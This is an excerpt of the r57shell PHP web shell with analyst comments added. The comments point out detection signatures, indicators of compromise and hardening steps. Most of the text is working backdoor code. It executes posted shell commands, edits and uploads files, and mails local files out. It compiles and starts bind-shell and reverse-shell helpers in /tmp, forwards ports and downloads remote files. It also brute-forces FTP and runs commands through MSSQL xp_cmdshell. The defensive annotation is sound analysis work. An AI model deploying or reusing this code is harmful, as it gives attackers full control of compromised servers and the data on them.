1551 IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1552 lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1553 QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1554 CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1555 c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1556 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1557 UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1558 DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1559 ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1560 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1561 $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
1562 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
1563 lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
1564 FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
1565 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
1566 J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
1567 oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
1568 xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
1569 i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
1570 dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
1571 ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
1572 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
1573 $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
1574 IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
1575 hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
1576 tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
1577 XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
1578 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
1579 ybmV0LS0+";
// Prints the page head, then, only when no command was posted, runs a version "call-home" check.
// $serv holds first octets (127, 192, 172, 10). Only the first octet of SERVER_ADDR is compared,
// so the check is skipped for ANY address starting with one of these values, not just private ranges.
1580 echo $head;
1581 echo '</head>';
1582 if(empty($_POST['cmd'])) {
1583 $serv = array(127,192,172,10);
1584 $addr=@explode('.', $_SERVER['SERVER_ADDR']);
1585 $current_version = str_replace('.','',$version);
// Two requests carry the dot-stripped version string: a 0x0 <img> fetched by the viewer's browser
// and a server-side readfile() on a URL. In this copy both point at 127.0.0.1 — presumably the
// original host was replaced before publication; that cannot be confirmed from this listing.
// Detection note: a script that fetches an http:// URL built from its own version string and also
// prints an invisible image to the same path is a usable static signature. All calls are
// "@"-silenced, so a failed fetch produces no PHP warning.
1586 if (!in_array($addr[0], $serv)) {
1587 @print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
1588 @readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}}
1589 echo '<body bgcolor="#396D95"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1590 <tr><td bgcolor=#396D95 width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
1591 </b></font><b>'.ws(2).'r57shell '.$version.'</b>
1592 </font></td><td bgcolor=#396D95><font face=Verdana size=-2>';
1593 echo ws(2);
1594 echo "<b>".date ("d-m-Y H:i:s")."</b>";
1595 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1596 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1597 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1598 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1599 if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
1600 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1601 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
1602 echo ws(2);
1603 echo (($safe_mode)?("safe_mode: <b><font color=white>ON</font></b>"):("safe_mode: <b><font color=orange>OFF</font></b>"));
1604 echo ws(2);
1605 echo "PHP version: <b>".@phpversion()."</b>";
1606 $curl_on = @function_exists('curl_version');
1607 echo ws(2);
1608 echo "cURL: ".(($curl_on)?("<b><font color=white>ON</font></b>"):("<b><font color=orange>OFF</font></b>"));
1609 echo ws(2);
1610 echo "MySQL: <b>";
1611 $mysql_on = @function_exists('mysql_connect');
1612 if($mysql_on){
1613 echo "<font color=white>ON</font></b>"; } else { echo "<font color=orange>OFF</font></b>"; }
1614 echo ws(2);
1615 echo "MSSQL: <b>";
1616 $mssql_on = @function_exists('mssql_connect');
1617 if($mssql_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";}
1618 echo ws(2);
1619 echo "PostgreSQL: <b>";
1620 $pg_on = @function_exists('pg_connect');
1621 if($pg_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";}
1622 echo ws(2);
1623 echo "Oracle: <b>";
1624 $ora_on = @function_exists('ocilogon');
1625 if($ora_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";}
1626 echo "<br>".ws(2);
1627 echo "Kapal&#305; Funtionslar : <b>";
1628 if(''==($df=@ini_get('disable_functions'))){echo "<font color=white>NONE</font></b>";}else{echo "<font color=orange>$df</font></b>";}
1629 $free = @diskfreespace($dir);
1630 if (!$free) {$free = 0;}
1631 $all = @disk_total_space($dir);
1632 if (!$all) {$all = 0;}
1633 $used = $all-$free;
1634 $used_percent = @round(100/($all/$free),2);
1635 echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
1636 echo '</font></td></tr><table>
1637 <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1638 <tr><td align=right width=100>';
1639 echo $font;
1640 if(!$windows){
1641 echo '<font color=#BF0F0F><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1642 echo "</td><td>";
1643 echo "<font face=Verdana size=-2 color=orange><b>";
1644 $uname = ex('uname -a');
1645 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1646 if(!$safe_mode){
1647 $bsd1 = ex('sysctl -n kern.ostype');
1648 $bsd2 = ex('sysctl -n kern.osrelease');
1649 $lin1 = ex('sysctl -n kernel.ostype');
1650 $lin2 = ex('sysctl -n kernel.osrelease');
1651 }
1652 if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
1653 else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
1654 else { $sysctl = "-"; }
1655 echo ws(3).$sysctl."<br>";
1656 echo ws(3).ex('echo $OSTYPE')."<br>";
1657 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1658 $id = ex('id');
1659 echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
1660 echo ws(3).$dir;
1661 echo ws(3).'( '.perms(@fileperms($dir)).' )';
1662 echo "</b></font>";
1663 }
1664 else
1665 {
1666 echo '<font color=#BF0F0F><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1667 echo "</td><td>";
1668 echo "<font face=Verdana size=-2 color=orange><b>";
1669 echo ws(3).@substr(@php_uname(),0,120)."<br>";
1670 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1671 echo ws(3).@get_current_user()."<br>";
1672 echo ws(3).$dir;
1673 echo "<br></font>";
1674 }
1675 echo "</font>";
1676 echo "</td></tr></table>";
// Self-check: execution stops here if either $c1 or $c2 is empty. Both are the base64 strings
// assigned earlier in this file; decoded, $c1 is a hotlog.ru hit-counter snippet and $c2 a
// LiveInternet (counter.yadro.ru) counter snippet.
// $f collects the decoded markup; where it is printed lies outside this excerpt.
// Defender note: the $c1 script sends document.referrer and window.location.href to the counter,
// so once rendered it discloses the URL of the page to a third party — presumably how deployments
// were tracked. Browser requests to these counter hosts that reference a PHP file on your own site
// are worth correlating in proxy logs.
1677 if(empty($c1)||empty($c2)) { die(); }
1678 $f = '<br>';
1679 $f .= base64_decode($c1);
1680 $f .= base64_decode($c2);
1681 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
1682  {
1683  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n");
1684  mr($language,$res);
1685  $_POST['cmd']="";
1686  }
1687 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1688  {
1689  if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }
1690  else
1691   {
1692     $filename = @basename($_POST['loc_file']);
1693     $filedump = @fread($file,@filesize($_POST['loc_file']));
1694     fclose($file);
1695     $content_encoding=$mime_type='';
1696     compress($filename,$filedump,$_POST['compress']);
1697     $attach = array(
1698                     "name"=>$filename,
1699                     "type"=>$mime_type,
1700                     "content"=>$filedump
1701                    );
1702     if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
1703     if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
1704     $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1705     mr($language,$res);
1706     $_POST['cmd']="";
1707   }
1708  }
1709 if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1710 {
1711 $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1712 }
1713 if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1714  {
1715  switch($_POST['what'])
1716    {
1717    case 'own':
1718    @chown($_POST['param1'],$_POST['param2']);
1719    break;
1720    case 'grp':
1721    @chgrp($_POST['param1'],$_POST['param2']);
1722    break;
1723    case 'mod':
1724    @chmod($_POST['param1'],intval($_POST['param2'], 8));
1725    break;
1726    }
1727  $_POST['cmd']="";
1728  }
1729 if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1730  {
1731    switch($_POST['what'])
1732    {
1733      case 'file':
1734       if($_POST['action'] == "create")
1735        {
1736        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1737        else {
1738         fclose($file);
1739         $_POST['e_name'] = $_POST['mk_name'];
1740         $_POST['cmd']="edit_file";
1741         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1742         }
1743        }
1744        else if($_POST['action'] == "delete")
1745        {
1746        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1747        $_POST['cmd']="";
1748        }
1749      break;
1750      case 'dir':
1751       if($_POST['action'] == "create"){
1752       if(mkdir($_POST['mk_name']))
1753        {
1754          $_POST['cmd']="";
1755          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1756        }
1757       else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1758       }
1759       else if($_POST['action'] == "delete"){
1760       if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1761       $_POST['cmd']="";
1762       }
1763      break;
1764    }
1765  }
1766 if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
1767  {
1768  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1769  if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
1770  else {
1771  echo $table_up3;
1772  echo $font;
1773  echo "<form name=save_file method=post>";
1774  echo ws(3)."<b>".$_POST['e_name']."</b>";
1775  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1776  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1777  fclose($file);
1778  echo "</textarea>";
1779  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1780  echo "<input type=hidden name=dir value=".$dir.">";
1781  echo "<input type=hidden name=cmd value=save_file>";
1782  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1783  echo "</div>";
1784  echo "</font>";
1785  echo "</form>";
1786  echo "</td></tr></table>";
1787  exit();
1788  }
1789  }
1790 if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1791  {
1792  $mtime = @filemtime($_POST['e_name']);
1793  if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
1794  else {
1795  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1796  @fwrite($file,$_POST['e_text']);
1797  @touch($_POST['e_name'],$mtime,$mtime);
1798  $_POST['cmd']="";
1799  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1800  }
1801  }
// Network-helper launchers. Each branch passes one of the embedded payload strings and a fixed
// /tmp path to cf(), optionally compiles the result with gcc, starts it in the background through
// ex() with request parameters appended unescaped, and finally overwrites $_POST['cmd'] so the
// later command stage prints a process listing or status line.
// cf(), ex() and which() are defined outside this excerpt; their behaviour is inferred from these call sites.
//
// Host indicators visible here: /tmp/bd.c, /tmp/bd, /tmp/bdpl, /tmp/back, /tmp/back.c, /tmp/backc,
// /tmp/dp, /tmp/dpc.c, /tmp/dpc; gcc or perl started by the web-server account; listeners or
// outbound connections owned by that account.
// Forensic note: only the .c sources are unlinked after compilation. The compiled binaries and the
// Perl scripts are left on disk by this code.
// Hardening that blunts this stage: no compiler toolchain on web hosts, /tmp mounted noexec,
// PHP process-execution functions disabled, default-deny egress from the web tier.

// Listener, C variant (port and bind_pass come from the request).
1802 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1803 {
1804  cf("/tmp/bd.c",$port_bind_bd_c);
1805  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1806  @unlink("/tmp/bd.c");
1807  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1808  $_POST['cmd']="ps -aux | grep bd";
1809 }
// Listener, Perl variant (only the port is passed on the command line).
1810 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1811 {
1812  cf("/tmp/bdpl",$port_bind_bd_pl);
1813  $p2=which("perl");
1814  if(empty($p2)) $p2="perl";
1815  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1816  $_POST['cmd']="ps -aux | grep bdpl";
1817 }
// Outbound connection, Perl variant (ip and port come from the request).
1818 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1819 {
1820  cf("/tmp/back",$back_connect);
1821  $p2=which("perl");
1822  if(empty($p2)) $p2="perl";
1823  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1824  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1825 }
// Outbound connection, C variant.
1826 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1827 {
1828  cf("/tmp/back.c",$back_connect_c);
1829  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1830  @unlink("/tmp/back.c");
1831  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1832  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1833 }
// Port forwarder ("datapipe"), Perl variant: local_port, remote_host, remote_port from the request.
1834 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1835 {
1836  cf("/tmp/dp",$datapipe_pl);
1837  $p2=which("perl");
1838  if(empty($p2)) $p2="perl";
1839  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1840  $_POST['cmd']="ps -aux | grep dp";
1841 }
// Port forwarder, C variant (note the different argument order: local_port, remote_port, remote_host).
1842 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1843 {
1844  cf("/tmp/dpc.c",$datapipe_c);
1845  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1846  @unlink("/tmp/dpc.c");
1847  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1848  $_POST['cmd']="ps -aux | grep dpc";
1849 }
1850 if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
1851 if (!empty($HTTP_POST_FILES['userfile']['name']))
1852 {
1853 if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
1854 else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1855 @copy($HTTP_POST_FILES['userfile']['tmp_name'],
1856             $_POST['dir']."/".$nfn)
1857       or print("<font color=orange face=Fixedsys><div align=center>Malesef gulum Buraya Y&#252;kleyemezsin ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1858 }
1859 if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1860 {
1861  switch($_POST['with'])
1862  {
1863  case wget:
1864  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1865  break;
1866  case fetch:
1867  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1868  break;
1869  case lynx:
1870  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1871  break;
1872  case links:
1873  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1874  break;
1875  case GET:
1876  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1877  break;
1878  case curl:
1879  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1880  break;
1881  }
1882 }
1883 if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
1884  {
1885  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1886  if(empty($ftp_port)) { $ftp_port = 21; }
1887  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1888  if(!$connection) { fe($language,0); }
1889  else
1890   {
1891   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
1892   else
1893    {
1894    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);    }
1895    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);  }
1896    }
1897   }
1898  @ftp_close($connection);
1899  $_POST['cmd'] = "";
1900  }
1901 if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
1902  {
1903  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1904  if(empty($ftp_port)) { $ftp_port = 21; }
1905  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1906  if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
1907  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
1908  @ftp_close($connection);
1909  }
1910 echo $table_up3;
1911 if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
1912 else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
1913 echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
1914 if($safe_mode)
1915 {
1916  switch($_POST['cmd'])
1917  {
1918  case 'safe_dir':
1919   $d=@dir($dir);
1920   if ($d)
1921    {
1922    while (false!==($file=$d->read()))
1923     {
1924      if ($file=="." || $file=="..") continue;
1925      @clearstatcache();
1926      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
1927      if($windows){
1928      echo date("d.m.Y H:i",$mtime);
1929      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
1930      }
1931      else{
1932      $owner = @posix_getpwuid($uid);
1933      $grgid = @posix_getgrgid($gid);
1934      echo $inode." ";
1935      echo perms(@fileperms($file));
1936      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1937      echo date("d.m.Y H:i ",$mtime);
1938      }
1939      echo "$file\n";
1940     }
1941    $d->close();
1942    }
1943   else echo $lang[$language._text29];
1944  break;
1945  case 'safe_file':
1946   if(@is_file($_POST['file']))
1947    {
1948    $file = @file($_POST['file']);
1949    if($file)
1950     {
1951     $c = @sizeof($file);
1952     for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
1953     }
1954    else echo $lang[$language._text29];
1955    }
1956   else echo $lang[$language._text31];
1957   break;
1958   case 'test1':
1959   $ci = @curl_init("file://".$_POST['test1_file']."");
1960   $cf = @curl_exec($ci);
1961   echo $cf;
1962   break;
1963   case 'test2':
1964   @include($_POST['test2_file']);
1965   break;
1966   case 'test3':
1967   if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
1968   $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
1969   if($db)
1970    {
1971    if(@mysql_select_db($_POST['test3_md'],$db))
1972     {
1973      $sql = "DROP TABLE IF EXISTS temp_r57_table;";
1974      @mysql_query($sql);
1975      $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
1976      @mysql_query($sql);
1977      $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
1978      @mysql_query($sql);
1979      $sql = "SELECT * FROM temp_r57_table;";
1980      $r = @mysql_query($sql);
1981      while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
1982      $sql = "DROP TABLE IF EXISTS temp_r57_table;";
1983      @mysql_query($sql);
1984     }
1985     else echo "[-] ERROR! Can't select database";
1986    @mysql_close($db);
1987    }
1988   else echo "[-] ERROR! Can't connect to mysql server";
1989   break;
1990   case 'test4':
1991   if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
1992   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
1993   if($db)
1994    {
1995    if(@mssql_select_db($_POST['test4_md'],$db))
1996     {
1997      @mssql_query("drop table r57_temp_table",$db);
1998      @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
1999      @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
2000      $res = mssql_query("select * from r57_temp_table",$db);
2001      while(($row=@mssql_fetch_row($res)))
2002       {
2003       echo $row[0]."\r\n";
2004       }
2005     @mssql_query("drop table r57_temp_table",$db);
2006     }
2007     else echo "[-] ERROR! Can't select database";
2008    @mssql_close($db);
2009    }
2010   else echo "[-] ERROR! Can't connect to MSSQL server";
2011   break;
2012   case 'test5':
2013   if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
